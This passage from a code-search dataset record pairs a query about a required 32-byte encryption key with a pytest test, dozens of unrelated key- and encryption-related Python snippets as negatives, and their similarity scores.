mph.wallet.addPrivateKey(unsafe_import_key)\n set_shared_morphene_instance(stm)", "def __init__(__self__, *,\n key_data: pulumi.Input[str]):\n pulumi.set(__self__, \"key_data\", key_data)", "def get_key(key):\n encrypt_key = pow(key, e, n)\n return encrypt_key", "def test_decrypt_key_default(self, settings):\n settings.CHITON_ENCRYPTION_KEY = b'0' * 32\n\n encrypted = encrypt('message')\n assert decrypt(encrypted) == 'message'\n\n settings.CHITON_ENCRYPTION_KEY = b'1' * 32\n with pytest.raises(EncryptionError):\n decrypt(encrypted)", "def test_rekey_non_encrypted(self):\n with pytest.raises(EncryptionError):\n rekey('message', old_key=b'0' * 32, new_key=b'1' * 32)", "def parse_key(raw_key):\n raw_key_bytes = raw_key.encode('ascii')\n try:\n validate_cmek(raw_key)\n key_type = KeyType.CMEK\n sha256 = None\n except errors.Error:\n if len(raw_key) != 44:\n raise\n key_type = KeyType.CSEK\n sha256 = hash_util.get_base64_hash_digest_string(\n hashlib.sha256(base64.b64decode(raw_key_bytes)))\n return EncryptionKey(key=raw_key, sha256=sha256, type=key_type)", "def __init__(self, pubkey, e=65537):\n if isinstance(pubkey, int):\n self.key = RSA.RsaKey(n=pubkey, e=e)\n\n else:\n if not isinstance(pubkey, str):\n raise ValueError('pubkey must be str or int.')\n\n if '----' in pubkey:\n try:\n self.key = RSA.import_key(pubkey)\n except Exception as e:\n print(e)\n else:\n if pubkey == pubkey.lower():\n pubkey = int(pubkey, 16)\n self.key = RSA.RsaKey(n=pubkey, e=e)\n else:\n pubkey = '-----BEGIN PUBLIC KEY-----\\n' + pubkey + '\\n-----END PUBLIC KEY-----'\n try:\n self.key = RSA.import_key(pubkey)\n except Exception as e:\n print(e)", "def key_handler(args):\n key = create_key(args.key_type, args.key_size, args.key_out)\n\n if not args.key_out:\n print(print_key(key))\n\n return key", "def encrypt(self, input, key, iv):\n pass", "def get_key(self):\r\n return self.__encryption_key", "def _add_key(self, key):\n key = key.strip().strip('@').lower()\n if self.homogenise_fields:\n if key in list(self.alt_dict.keys()):\n key = self.alt_dict[key]\n if not isinstance(key, ustr):\n return ustr(key, 'utf-8')\n else:\n return key", "def upload_key():\n data = check_args(('cloudProvider', 'key'))\n provider = jobs.init_provider(data, True)\n key = decrypt_key(data['key'], data['username'])\n provider.save_key(key)\n return make_response()", "def test_set_key():\n\n assert symmetric.set_key(\"test\") == \"test\"", "def _check_key(self, key):\n raise NotImplementedError", "def set_key(self, key):\n self.key = key", "def serialize_key(key: str) 
-> bytes:\n return key.encode(\"utf-8\")", "def _get_encryption_key(self, obj, field_name: str):\n return hashlib.sha256(\n f'{obj.pk}::{self.get_encryption_key(obj)}::'\n f'{settings.GDPR_KEY if hasattr(settings, \"GDPR_KEY\") else settings.SECRET_KEY}::{field_name}'.encode(\n 'utf-8')).hexdigest()", "def encrypt(cls, plaintext, aad, key, iv):", "def def_key(x):\n return x", "def encrypt_and_encode(data, key):\r\n return base64.urlsafe_b64encode(aes_encrypt(data, key))", "def __init__(self, encoded_message, key):\n self.encoded_message = encoded_message\n self.key = key", "def recipient_public_key(self):", "def __generate_key(self, keyword, action):\n encryption_key = {}\n\n # get separate modified & unmodified alpha objects\n plain_alpha = self.helpers.alphabet(\"list\")\n cipher_alpha = self.helpers.alphabet(\"list\")\n\n # remove duplicate letters from the keyword\n keyword_stripped = self.helpers.unique(keyword)\n\n # remove keyword letters from cipher alpha\n for i in range(len(keyword_stripped)):\n cipher_alpha.remove(keyword_stripped[i])\n\n # append keyword letters to cipher alpha\n cipher_alpha = keyword_stripped + cipher_alpha\n\n if action == \"encrypt\":\n # generate encryption key\n for i in range(len(plain_alpha)):\n encryption_key[plain_alpha[i]] = cipher_alpha[i]\n elif action == \"decrypt\":\n # generate decryption key\n for i in range(len(plain_alpha)):\n encryption_key[cipher_alpha[i]] = plain_alpha[i]\n else:\n raise ValueError(\"Cheatin', uh?\")\n\n return encryption_key", "def encode_email(email, key):\n return", "def encrypt_vigenere(plaintext: str, keyword: str) -> str:", "def test_rekey(self):\n old_key = b'0' * 32\n new_key = b'1' * 32\n\n old_encrypted = encrypt('message', key=old_key)\n new_encrypted = rekey(old_encrypted, old_key=old_key, new_key=new_key)\n\n assert decrypt(new_encrypted, key=new_key) == 'message'", "def test_decrypt_key_incorrect(self):\n right_key = b'0' * 32\n wrong_key = b'1' * 32\n\n encrypted = encrypt('message', key=right_key)\n\n with pytest.raises(EncryptionError):\n decrypt(encrypted, key=wrong_key)", "def encrypt_data_key(self, dataKey, token, userGroup):\n masterKey = self.retrieve_master_key(token=token, userGroup=userGroup)\n box = secret.SecretBox(masterKey)\n if isinstance(dataKey, str):\n dataKey = dataKey.encode('utf-8')\n cipherText= box.encrypt(dataKey).decode('cp855')\n return cipherText", "def test_encryption(e, c):\n\n#\te = int(raw_input(\"\\nEnter e from public key\\n\"))\n#\tc = int(raw_input(\"\\nEnter c from public key\\n\"))\n\n string = raw_input(\"\\nEnter word to encrpyt\\n\")\n for i in range(0, len(string)):\n print endecrypt(ord(string[i]), e, c)", "def encrypt_letter(letter, keystr_value):\n \n letter_value = ord(letter) - 65\n if (letter_value + keystr_value) > 25:\n new_value = (letter_value + keystr_value) + 65 - 26\n encrypted_letter = chr(new_value)\n else:\n new_value = letter_value + keystr_value + 65\n encrypted_letter = chr(new_value)\n return encrypted_letter", "def setKey(self, time, attributeIndex, hash, value, view) -> None:\n ...", "def prepare_key (self, key, for_seq):\n r_key = \"%s:%d:%s\" % (self.classkey, for_seq, key)\n return r_key" ]
[ "0.6910627", "0.6908906", "0.6589015", "0.6589015", "0.65658104", "0.64406216", "0.64385355", "0.6403656", "0.6396212", "0.6384059", "0.63731337", "0.6366203", "0.633905", "0.6292146", "0.6261021", "0.62500477", "0.62206835", "0.62103766", "0.61971515", "0.6182859", "0.6168541", "0.6161391", "0.6161391", "0.6154665", "0.61417025", "0.61417025", "0.61330914", "0.611646", "0.6104688", "0.60838103", "0.6076095", "0.6066734", "0.6043034", "0.60418904", "0.6036839", "0.6034881", "0.6031524", "0.6024177", "0.6020957", "0.60196835", "0.6018721", "0.6016701", "0.60074633", "0.60000974", "0.5992623", "0.59819955", "0.59801775", "0.5976539", "0.5976323", "0.59636825", "0.59580624", "0.595429", "0.5940465", "0.5917046", "0.59112483", "0.5909821", "0.59087443", "0.5907167", "0.59024495", "0.59024495", "0.5900495", "0.58989775", "0.58936447", "0.589128", "0.58907443", "0.58885777", "0.58847207", "0.5877799", "0.5872674", "0.58571595", "0.58565414", "0.5855792", "0.5851382", "0.58476466", "0.58460546", "0.5843634", "0.58386934", "0.5828362", "0.58145696", "0.5811466", "0.58088094", "0.5803552", "0.5795303", "0.5795121", "0.5793531", "0.57787526", "0.57693815", "0.5756758", "0.57522756", "0.5750785", "0.5748262", "0.57482356", "0.5741913", "0.5740748", "0.5717498", "0.57163405", "0.5712756", "0.571268", "0.5710999", "0.5705612" ]
0.6712674
2
It requires a 32-byte key.
def test_encrypt_key_invalid(self): with pytest.raises(EncryptionError): encrypt('message', key=b'0' * 31)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, key: bytes):\n\n if len(key) != 32:\n raise ValueError('Key must be 32 bytes long')\n self.key = key", "def create_key ():", "def __init__(self, key):\n self.bs = 16\n self.key = hashlib.sha256(key.encode()).digest()", "def load_key():", "def test_long():\n key = 'A' * 242\n hashed_key = '%s[3705915182]' % ('A' * 229)\n full_key = 'prefix:1:%s' % hashed_key\n assert full_key == make_key(key, 'prefix', 1)", "def __init__(self, key: bytearray):\n self.__key = key\n self.__KSA(bytearray([i for i in range(256)]))", "def __init__(self,key):\n self.block_size = 32\n self.key = hashlib.sha256(key).digest()", "def key():", "def key(key):\n return key", "def load_key(self, type, keyid):\n pass", "def keyIndex(self, key):\n key ^= bsr(key, 33)\n key *= 0xff51afd7ed558ccdL\n key ^= bsr(key, 33)\n key *= 0xc4ceb9fe1a85ec53L\n key ^= bsr(key, 33)\n return key", "def __init__(self, key):\n self.key = key\n self.BLOCK_SIZE = 16", "def generate_random_key():\n return '%030x' % (random.randrange(256**15),)", "def key():\n pass", "def key():\n pass", "def _get_raw_key(self, key_id):", "def _GetKeyString(self):", "def _GetKeyString(self):", "def key_for_bucket(self, key):\n\n try:\n return int(key[0] // 16), int(key[1] // 16), int(key[2] // 16)\n except ValueError:\n return KeyError(\"Key %s isn't usable here!\" % repr(key))", "def key_for_bucket(self, key):\n\n try:\n return int(key[0] // 16), int(key[1] // 16)\n except ValueError:\n return KeyError(\"Key %s isn't usable here!\" % repr(key))", "def generate_key():\n return get_random_bytes(KEY_SIZE)", "def _newKey(self, key):\n pass", "def test_encrypt_key(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n assert encrypted\n assert encrypted != 'message'", "def generate_key():\n\tkey = [ randint(0,255) for i in range(16) ]\n\treturn bytes( key )", "def _set_key(self, key):\n\n # select 56 bits from the 64-bit key\n key = self._permutate(self.__pc1, self._string_to_bitlist(key))\n self.L = key[:28]\n self.R = key[28:]\n for i in range(0, 16):\n for j in range(0, self.__left_rotations[i]):\n self.L.append(self.L[0])\n del self.L[0]\n self.R.append(self.R[0])\n del self.R[0]\n # select 48 bits from 56 bits\n self.Kn[i] = self._permutate(self.__pc2, self.L + self.R)", "def test_set_key_too_long(self):\n with RandomKeyTmpFile(128) as fname:\n command_line = self._MENU + [self._KEYNAME, \"--keyfile-path\", fname]\n self.check_error(StratisCliEngineError, command_line, _ERROR)", "def isValidKey(key):\n return True", "def key_id(cls, url: str):\r\n ...", "def load_key():\n return open(\"Secret.key\",\"rb\").read()", "def hashId(key, size):\n return sum([ord(c) for c in key]) % size", "def get_key_id(self):", "def hash_key(self, key):\r\n hashed_key = sum((ord(char) for char in key))\r\n return hashed_key % 20", "def generate_key(self)->bytes:\n return os.urandom(32)", "def __init__(self, key):\n self._block_size = AES.block_size\n self._key = hashlib.sha256(get_as_bytes(key)).digest()", "def load_key(self, key):\n self.key = key", "def private_key(self):", "def public_key(self):", "def generate_key():\n return unicode(hashlib.sha224(str(random.getrandbits(128))).hexdigest())", "def _key_hash(self, key):\n\n split_key = key.strip(' ').split(' ')[1]\n return int(split_key)", "def safe_key(key, key_prefix, version):\r\n\r\n # Clean for whitespace and control characters, which\r\n # cause memcache to raise an exception\r\n key = cleaned_string(key)\r\n key_prefix = cleaned_string(key_prefix)\r\n version = cleaned_string(version)\r\n\r\n # 
Attempt to combine the prefix, version, and key\r\n combined = \":\".join([key_prefix, version, key])\r\n\r\n # If the total length is too long for memcache, hash it\r\n if len(combined) > 250:\r\n combined = fasthash(combined)\r\n\r\n # Return the result\r\n return combined", "def _check_key(self, key):\n raise NotImplementedError", "def RequireScriptHash(key):\n Require(len(key) == 20)\n return True", "def test_getKey_nokey(self):\n filename = os.path.join(os.getcwd(), 'sekrit')\n key = crypto.getKey(filename)\n self.failUnlessIsInstance(key, basestring,\n \"key isn't a string! type=%r\" % type(key))", "def hex_key(uid: Text, mp: Text) -> Text:\n\n key = sha256(mp.encode('utf-8') + admin_pass.encode('utf-8')).hexdigest()\n return sha256(uid.lower().encode('utf-8') + key.encode('utf-8')).hexdigest()[:40]", "def validate_authkey(value):\n if not len(value) == 32:\n raise ValidationError(\n 'Value must be a string containing 32 alphanumeric characters')", "def gen_key():\n key = os.urandom(32) # 256 bit\n return base64.b64encode(key).rstrip('=') # strip off padding", "def key_size(self) -> int:\n pass", "def key_size(self) -> int:\n pass", "def test_short():\n key = 'A' * 241\n full_key = 'prefix:1:%s' % key\n assert full_key == make_key(key, 'prefix', 1)", "def __init__(self, key):\n self.key = key", "def from_key(self, public_id, key):\n otp = self.get_otp(key)\n from_key = modhex_encode(public_id.encode('hex')) + modhex_encode(otp.encode('hex'))\n return from_key", "def MakeKey(self, string, string_1, string_2):\n ...", "def prepare_key(self, key):\n return smart_str(key)", "def proper_key(key, klen):\n ckey = \"\"\n if len(key) < klen:\n lmulti = math.floor(klen/len(key))\n lmod = klen % len(key)\n ckey = key * int(lmulti) + key[:lmod]\n elif len(key) > klen:\n ckey = key[:klen]\n else:\n ckey = key\n return ckey", "def _safe_key(self, key):\n if isinstance(key, str):\n key = key.encode('UTF-8')\n return key", "def generate_random_key(self):\n self.key = ''.join(choice(ascii_letters + digits) for i in range(300))", "def test_rekey_key_format(self):\n old_key = b'0' * 32\n encrypted = encrypt('message', key=old_key)\n\n with pytest.raises(EncryptionError):\n rekey(encrypted, old_key=old_key, new_key=b'1' * 31)", "def __init__(self, aKey):\n self.key = aKey\n\n # CRC can be used to validate a key (very roughly)\n # if you store the CRC from a previous keyword\n # and then compare with a newly generated one and\n # they are the same then chances are the keyword\n # is correct - only a single byte so not that reliable\n self.crc = 0 \n for x in self.key:\n intX = ord(x)\n self.crc = self.crc ^ intX", "def test_get_key_digest_with_integer_key(self):\n\n digest = self.as_connection.get_key_digest(\"test\", \"demo\", 1)\n\n assert isinstance(digest, bytearray)", "def _key_array(key):\n key = map(ord, key)[:16]\n initial = map(ord, \"6170383452343567\")\n while len(key) < len(initial):\n key.append(initial[len(key)])\n return key", "def load_key(self):\n\t return open(\"key.key\", \"rb\").read()", "def entry(from_code, key):\n # turn code to hexadecimal\n from_code = DC.uniToHex(from_code)\n\n en = DESEncode()\n string_len = len(from_code)\n\n if string_len < 1:\n print 'error input'\n return False\n key_code = en.encode(from_code, key, string_len)\n return key_code", "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def 
create_key(message, key):\n if len(key) > len(message):\n return key[0:len(message)]\n new_key = key * int(len(message)/len(key))\n new_key += key[0:len(message) - len(new_key)]\n return new_key", "def __generate_key(length):\n if length % 2 != 0:\n raise ValueError(\"'length' must be a multiple of 2\")\n length_bytes = int(length / 2) # length of key in bytes\n key_bytes = os.urandom(length_bytes)\n return binascii.hexlify(key_bytes).decode()", "def keyExp(key):\r\n def sub2Nib(b):\r\n \"\"\"Swap each nibble and substitute it using sBox\"\"\"\r\n return sBox[b >> 4] + (sBox[b & 0x0f] << 4)\r\n \r\n Rcon1, Rcon2 = 0b10000000, 0b00110000\r\n w[0] = (key & 0xff00) >> 8\r\n w[1] = key & 0x00ff\r\n w[2] = w[0] ^ Rcon1 ^ sub2Nib(w[1])\r\n w[3] = w[2] ^ w[1]\r\n w[4] = w[2] ^ Rcon2 ^ sub2Nib(w[3])\r\n w[5] = w[4] ^ w[3]", "def test_create_key():\n\n assert symmetric.create_key() != \"\"", "def generate_aes_key ( ) :\n import hashlib\n sr = Crypto.Random.random.StrongRandom( )\n key_bits = sr.getrandbits( 256 )\n sha_key = hashlib.sha256( str( key_bits ) ).digest( )\n return sha_key", "def test_generate_key(self): \n k = Key().generate()\n self.assertRegex(k, \"[a-zA-Z0-9+\\/]+={0,2}\")", "def __init__(self, key):\n if len(key) > KEY_SIZE:\n raise ParameterError(\"Key must be <%d bytes\" % (KEY_SIZE))\n\n self.key = key.ljust(KEY_SIZE, b\"\\xff\")\n self.encryptIV = b\"\\xff\" * BLOCK_SIZE\n self.decryptIV = b\"\\xff\" * BLOCK_SIZE\n self.remainingData = b\"\"\n self.oldDecrypt = b\"\"", "def load_key():\n return open(\"secret.key\", \"rb\").read()", "def get_random_key(self, size=16):\n key = ''.join([random.choice(Characters.get_characters()) for i in range(size)])\n return self.__strengthen_key(key)", "def _encode_key(self, key: str) -> str:\n return key", "def __init__(self, key=None):\n self.key = key", "def test_getKey_keyexists(self):\n filename = self.mktemp()\n with open(filename, 'wb') as fh:\n fh.write(SEKRIT_KEY)\n fh.flush()\n\n key = crypto.getKey(filename)\n self.failUnlessIsInstance(key, basestring,\n \"key isn't a string! 
type=%r\" % type(key))\n self.assertEqual(SEKRIT_KEY, key,\n \"\"\"The example key and the one read from file differ!\n key (in hex): %s\n SEKRIT_KEY (in hex): %s\"\"\"\n % (key.encode('hex'), SEKRIT_KEY.encode('hex')))", "def _filesystem_safe_encode(key):\n return hashlib.sha256(key.encode()).hexdigest()", "def hash_key(self):", "def generate_key():\r\n\t\treturn ''.join(random.SystemRandom().choice(string.ascii_lowercase) for _ in range(123))", "def load(self, key: str) -> str:\n pass", "def unique_key(size):\n # Charset to create keys from\n charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'\n l = len(charset)-1\n bad_key = 1\n\n # Get a new seed\n ran.seed()\n\n while(bad_key > 0):\n # Create key\n key = list()\n for i in range(size):\n r = ran.randint(0, l)\n key.append(charset[r])\n key = \"\".join(key)\n\n # Check key\n bad_key = check_key(key)\n\n return(key)", "def JAVA_NATIVE(key):\n h = 0\n l = len(key)\n for (idx,c) in enumerate(key):\n h += ord(c)*31**(l-(idx+1))\n return _signed_int32(h)", "def test_set_key():\n\n assert symmetric.set_key(\"test\") == \"test\"", "def key_upload(self, key=None):\n raise NotImplementedError", "def corrupt(self, key):\n rand_bytes = random.getrandbits(8)\n byte_str = bytes([rand_bytes])\n self.client[key] = byte_str\n print('Corrupted %s in redis' % key)", "def genKey(length=32):\r\n return os.urandom(length)", "def key_handler(args):\n key = create_key(args.key_type, args.key_size, args.key_out)\n\n if not args.key_out:\n print(print_key(key))\n\n return key", "def keyGen(key):\n def leftShift(keyBitList):\n \"\"\"Perform a circular left shift on the first and second five bits\"\"\"\n shiftedKey = [None] * KeyLength\n shiftedKey[0:9] = keyBitList[1:10]\n shiftedKey[4] = keyBitList[0]\n shiftedKey[9] = keyBitList[5]\n return shiftedKey\n\n # Converts input key (integer) into a list of binary digits\n keyList = [(key & 1 << i) >> i for i in reversed(range(KeyLength))]\n permKeyList = [None] * KeyLength\n for index, elem in enumerate(P10table):\n permKeyList[index] = keyList[elem - 1]\n shiftedOnceKey = leftShift(permKeyList)\n shiftedTwiceKey = leftShift(leftShift(shiftedOnceKey))\n subKey1 = subKey2 = 0\n for index, elem in enumerate(P8table):\n subKey1 += (128 >> index) * shiftedOnceKey[elem - 1]\n subKey2 += (128 >> index) * shiftedTwiceKey[elem - 1]\n return (subKey1, subKey2)", "def game_key(proto_obj):\n return game_key_full(proto_obj.id_str)", "def test_getKey_tmpfile(self):\n filename = self.mktemp()\n key = crypto.getKey(filename)\n self.failUnlessIsInstance(key, basestring,\n \"key isn't a string! 
type=%r\" % type(key))", "def fullkey(self, key):\n if len(self.basekey) > 0:\n return \"{}:{}\".format(self.basekey, key)\n else:\n return key", "def testKeyInfoTooShort(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='x', keyInfo='xx')", "def _hash(self, key):\n if self.function == 'fnv':\n h = 2166136261\n for i in range(len(key)):\n h = (h * 16777619) ^ ord(key[i])\n return h\n elif self.function == 'add':\n h = 0\n for i in range(len(key)):\n h += ord(key[i])\n return h", "def serialize_key(key: str) -> bytes:\n return key.encode(\"utf-8\")", "def gen_api_key():\r\n m = hashlib.sha256()\r\n m.update(get_random_word(12))\r\n return unicode(m.hexdigest()[:12])", "def parse_key(self, key):\r\n if not key:\r\n self.aes = None # empty key == no encryption\r\n return self.parse_string(self.tmp) # must return size (see the next return)\r\n key.decode() # test availability\r\n size = len(key)\r\n for padding in (16, 24, 32): # fixed key size\r\n if size <= padding:\r\n break\r\n key += chr(0) * (padding - size)\r\n self.aes = AES.new(key)\r\n return self.parse_string(self.tmp) # if key changes you must update string\r", "def randkey():\n return binascii.b2a_hex(os.urandom(15))", "def test_generate_api_key():\n\n key = auth.generate_api_key() # returns a NamedTuple with api_key and hashed_key\n hashed_api_key = sha256(key.api_key.encode('utf-8')).hexdigest()\n assert hashed_api_key == key.hashed_key", "def testKeyInfoTooLong(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='hey',\n keyInfo='xxxxx')", "def h_python(key, N):\n return hash(key) % N", "def __LFSR(self, key: bytearray) -> int:\n x = key.pop()\n out = x ^ key[254] ^ key[244]\n key.append(out)\n return out" ]
[ "0.79996747", "0.71131784", "0.70681524", "0.7063389", "0.70164996", "0.6956813", "0.69228464", "0.69088066", "0.6835613", "0.67935926", "0.6759126", "0.6737713", "0.6699715", "0.66468084", "0.66468084", "0.65837467", "0.65774214", "0.65774214", "0.65307164", "0.6464985", "0.64625424", "0.643235", "0.64101267", "0.6408171", "0.63811934", "0.6369116", "0.63650167", "0.6344605", "0.6334173", "0.63146996", "0.62892807", "0.6288386", "0.6286577", "0.6285275", "0.6283864", "0.6278853", "0.6249924", "0.6238881", "0.62190056", "0.6217997", "0.6213589", "0.62095004", "0.6209226", "0.6201688", "0.61836094", "0.6166667", "0.6165022", "0.6165022", "0.6163094", "0.6145223", "0.6144982", "0.6144738", "0.61326903", "0.61309487", "0.61263996", "0.61202836", "0.61177725", "0.6115924", "0.6086478", "0.6084419", "0.60821015", "0.60734737", "0.6071975", "0.6069795", "0.6059456", "0.60388273", "0.60339713", "0.60257035", "0.6022661", "0.6008294", "0.6002849", "0.5990089", "0.59898555", "0.59878814", "0.59869343", "0.5986146", "0.5984032", "0.597779", "0.5976863", "0.59743935", "0.5973422", "0.59568775", "0.59558827", "0.5949787", "0.5946712", "0.59427214", "0.59401184", "0.5936034", "0.5932137", "0.5931684", "0.59098715", "0.5903735", "0.590285", "0.58903736", "0.5884997", "0.58776677", "0.5875996", "0.5874685", "0.5870695", "0.58642685" ]
0.60107034
69
It gets its default key from settings.
def test_encrypt_key_default(self, settings): settings.CHITON_ENCRYPTION_KEY = None with pytest.raises(EncryptionError): encrypt('message')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def default(self, key):\r\n return self.inherited_settings[key.field_name]", "def get(self, key, default=None):\n return self.settings.get(key, default)", "def initial(self):\n from setman import settings\n return getattr(settings, self.name, self.default)", "def get_setting_default(cls, key, **kwargs):\n setting = cls.get_setting_definition(key, **kwargs)\n\n return setting.get('default', '')", "def get_setting(self, key, default=NOT_SET):\n if key in self.settings:\n return self.settings[key]\n app_key = 'tangled.app.' + key\n if app_key in self.settings:\n return self.settings[app_key]\n if default is NOT_SET:\n raise KeyError(\"'{}' not present in settings\".format(key))\n return default", "def get_setting_value(self, key, default = None):\n \n if not \"settings\" in self.configuration or not key in self.configuration['settings']:\n return default\n \n return self.configuration['settings'][key]", "def get(self, key: str, default: Optional[str] = None) -> Optional[str]:\n if key == \"stitch\":\n return \"NewStitch\"\n return key", "def get(self, key, default=None):", "def get(self, key, default=None):\n pass", "def get(self, key: str, default: Optional[str] = None) -> Optional[str]:\n if key == \"Dinosaur\":\n return \"NewDinosaur\"\n return key", "def get(self, id, key, default=None):\n try:\n id_settings = self.id_dict[id]\n val = id_settings[key]\n except KeyError:\n try:\n val = self.default_settings[key]\n except KeyError:\n val = default\n return val", "def get(self, key, default):\n return self.plugin.get(key, default)", "def get(self, key, default=None):\n try:\n val = self._store.get(key)\n except KeyError:\n val = default\n if val is None and not default:\n return self._auto_prompt(key)\n return val", "def get(self, key: str, default: Optional[str] = None) -> Optional[str]:\n if key == \"Dinosaur\":\n return None\n return key", "def get(self, name, default=''):\n return getattr(settings, name, DEFAULT_SETTINGS.get(name, default))", "def getKey( self, key ):\n if key in self.conf:\n return self.conf[key]\n else:\n return None", "def get(self, key, default=None):\n if key in self:\n return self[key]\n return default", "def get(self, key, default=None):\n return self[key] if key in self else default", "def get(self, key, default=None):\n try:\n return self[key]\n except KeyError:\n return default", "def get(self, key: str, default: Optional[str] = None) -> Optional[str]:\n if key == \"id\":\n return \"Id\"\n return key", "def get(self, key, default=None):\r\n try:\r\n return self[key]\r\n except KeyError:\r\n return default", "def get(self, key, default=None):\n raise NotImplementedError()", "def get(cls, key: EnumKeyType, default: EnumKeyType = None) -> str:\n try:\n return cls[key]\n except KeyError:\n return default", "def get_sublime(self, key, default=None):\n return self.sublime_settings.get(key, default)", "def get(key, default=None):\n config = _get_config_dict()\n return config.get(key, default)", "def get(self, key, default=None):\n try:\n return self.context.get(self.prefix+'.'+key, default)\n except AttributeError:\n return default", "def get_setting(setting_name, default=None):\n settings_dict = getattr(settings, 'SIMPLE_FORUMS', None)\n\n if settings_dict:\n return settings_dict.get(setting_name, default)\n\n return default", "def get(self, key, default=None):\n return self.get_models().get(str(key), default)", "def default_value(self):\n return self.__class__.get_setting_default(self.key, **self.get_kwargs())", "def get(self, key, default=None):\n try:\n return 
self._get(key)\n except Exception:\n return default", "def get(self, key: str, default=None) -> Any:\n try:\n return self[key][0]\n except KeyError:\n return default", "def get_default(self):\n\n\t\treturn self.__default", "def get_option(self, key, default=None):\n current_profile = \"profiles.{}.{}\".format(self.get_profile(), key)\n global_profile = \"profiles.global.{}\".format(key)\n return self.__get_option__(current_profile, self.__get_option__(global_profile, default))", "def getDefault():", "def get_dictionary_default(path):\n if path in defaults_dict.keys():\n return defaults_dict[path]\n else:\n return ''", "def Default():\n return _DEFAULT", "def get(self, key, default=0):\n try:\n return self[key]\n except KeyError:\n return default", "def get(self, key, default=''):\n key = self.optionxform(key)\n cached = self._cache.get(key, _use_default)\n if cached is not _use_default:\n return cached\n name_str = self.name\n key_str = to_unicode(key)\n settings = ProductSetting.select(self.env,\n where={'product': self.product,\n 'section': name_str,\n 'option': key_str})\n if len(settings) > 0:\n value = settings[0].value\n else:\n for parent in self.config.parents:\n value = parent[self.name].get(key, _use_default)\n if value is not _use_default:\n break\n else:\n if default is not _use_default:\n option = Option.registry.get((self.name, key))\n value = option.default if option else _use_default\n else:\n value = _use_default\n if value is _use_default:\n return default\n if not value:\n value = u''\n elif isinstance(value, basestring):\n value = to_unicode(value)\n self._cache[key] = value\n return value", "def get(self, keyname: str, default: Optional[Any] = None) -> Any:\n try:\n return self[keyname]\n except KeyError:\n return default", "def default(self, key):\n raise KeyError(repr(key))", "def getSetting(self,section,key,default=None):\n section,key = map(bolt.LString,(section,key))\n settings = self.getSettings()\n if section in settings:\n return settings[section].get(key,default)\n else:\n return default", "def setting(name, default=None):\n return getattr(settings, name, default)", "def _get_simple_default_value(simple):\n return _SIMPLE_DEFAULT_VALUES[simple]", "def get(self, key):\n try:\n if key == key.upper():\n return self.config[key]\n return self.options[key]\n except KeyError:\n return None", "def default_value(self, key: str) -> Any:\n return _ba.get_appconfig_default_value(key)", "def get(self, key, default=None):\n return self._d.get(key, default)", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return 
pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def getKey(kwargs,key,default=None):\n value = kwarg.get(key,default)\n if value==None:\n return default\n return value", "def setdefault(self, key):\n pass", "def get_default(name, value):\n return os.environ.get('EXAMPLE_{}'.format(name.upper()), value)", "def default(self):\n return self.get(name='Unknown')", "def default():\n return DefaultSwh.default()", "def get(self, key, default_val=None):\n if key not in self._config.keys(): # we don't want KeyError\n return default_val # just return None if not found\n return self._config[key]", "def get_setting_definition(cls, key, **kwargs):\n settings = kwargs.get('settings', cls.SETTINGS)\n\n key = str(key).strip().upper()\n\n if settings is not None and key in settings:\n return settings[key]\n else:\n return {}", "def get(self, key: str, default: Any = None) -> Any:\n try:\n return getattr(self, key)\n except AttributeError:\n return default", "def get(self, key: str, default: Optional[Any] = None) -> Any:\n raise NotImplementedError", "def get(self, key: str, default: Union[str, T] = '') -> Union[str, T]:\n key = key.casefold()\n for k in self._keys:\n if k.casefold() == key:\n return self._keys[k]\n else:\n return default", "def opt(self, key, default=False):\n if key not in self.options:\n return default\n return self.options.get(key)", "def get(self, name):\n try:\n return self._defaults[name]\n except KeyError:\n raise UndefinedDefault(\"default %s is undefined\" % name)", "def setdefault_key_value(self):\n raise NotImplementedError", "def get_global(self, key, default=None, as_tuple=False):\n if as_tuple:\n return (self.get_global(key, default, as_tuple=False), True)\n else:\n return self.settings.get(key, default)", "def get(self, key, default=None):\n result = self._get_raw_input().get(key, default)\n return result[0] if isinstance(result, list) else result", "def GetSetting(appname, section, key, default=None):\n settings = _OptionsDB(appname)\n try:\n return settings[section, key]\n except 